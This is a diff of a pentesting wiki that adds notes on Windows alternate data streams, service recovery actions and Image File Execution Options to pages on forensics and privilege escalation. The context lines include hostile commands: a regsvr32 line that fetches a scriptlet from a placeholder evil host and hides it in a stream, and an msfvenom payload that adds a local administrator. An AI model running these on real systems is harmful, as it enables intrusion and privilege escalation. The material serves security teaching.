GitBook: [master] 4 pages modified

forensics/basic-forensic-methodology/windows-forensics/README.md

@@ -14,6 +14,10 @@ Timeline is a Windows characteristic that provides **chronological history** of
 The database resides in the path `\Users\<username>\AppData\Local\ConnectedDevicesPlatform\<id>\ActivitiesCache.db`  
 This database can be open with a SQLite tool or with the tool [**WxTCmd**](https://github.com/EricZimmerman/WxTCmd) **which generates 2 files that can be opened with the tool** [**TimeLine Explorer**](https://ericzimmerman.github.io/#!index.md).
 
+### ADS/Alternate Data Streams
+
+Files downloaded may contain the **ADS Zone.Identifier** indicating **how** was **downloaded** \(from the intranet, Internet...\) and some software \(like browser\) usually put even **more** **information** like the **URL** from where the file was downloaded.
+
 ## **File Backups**
 
 ### Recycle Bin

windows/basic-cmd-for-pentesters.md

@@ -495,9 +495,13 @@ esentutl.exe /y C:\ADS\autoruns.exe /d c:\ADS\file.txt:autoruns.exe /o
 powershell -command " & {(Get-Content C:\ADS\file.exe -Raw | Set-Content C:\ADS\file.txt -Stream file.exe)}"
 curl file://c:/temp/autoruns.exe --output c:\temp\textfile1.txt:auto.exe
 cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://evilsite.com/RegSvr32.sct   ^scrobj.dll > fakefile.doc:reg32.bat
+set-content - path {path to the file} - stream {name of the stream}
 
 ### Discover ADS contecnt
 dir /R 
+streams.exe <c:\path\to\file> #Binary from sysinternals#
+Get-Item -Path .\fie.txt -Stream *
+gci -recurse | % { gi $_.FullName -stream * } | where stream -ne ':$Data'
 
 ###Extract content from ADS###
 expand c:\ads\file.txt:test.exe c:\temp\evil.exe

windows/windows-local-privilege-escalation/README.md

@@ -631,6 +631,10 @@ You can manually create a service binary with metasploit:
 msfvenom -p windows/exec CMD="net localgroup administrators username /add" -f exe-service -o service.exe
 ```
 
+### Recovery Actions
+
+It's possible to indicate Windows what it should do[ when executing a service this fails](https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc753662%28v=ws.11%29?redirectedfrom=MSDN). If that setting is pointing a binary and this binary can be overwritten you may be able to escalate privileges.
+
 ## Applications
 
 ### Installed Applications

windows/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md

@@ -308,6 +308,13 @@ Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Classes\htmlfile\shell\open\comm
 Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Wow6432Node\Classes\htmlfile\shell\open\command' -Name ""
 ```
 
+### Image File Execution Options
+
+```text
+HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
+HKLM\Software\Microsoft\Wow6432Node\Windows NT\CurrentVersion\Image File Execution Options
+```
+
 ## SysInternals
 
 Note that all the sites where you can find autoruns are **already searched by**[ **winpeas.exe**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe). However, for a **more comprehensive list of auto-executed** file you could use [autoruns ](https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns)from systinternals: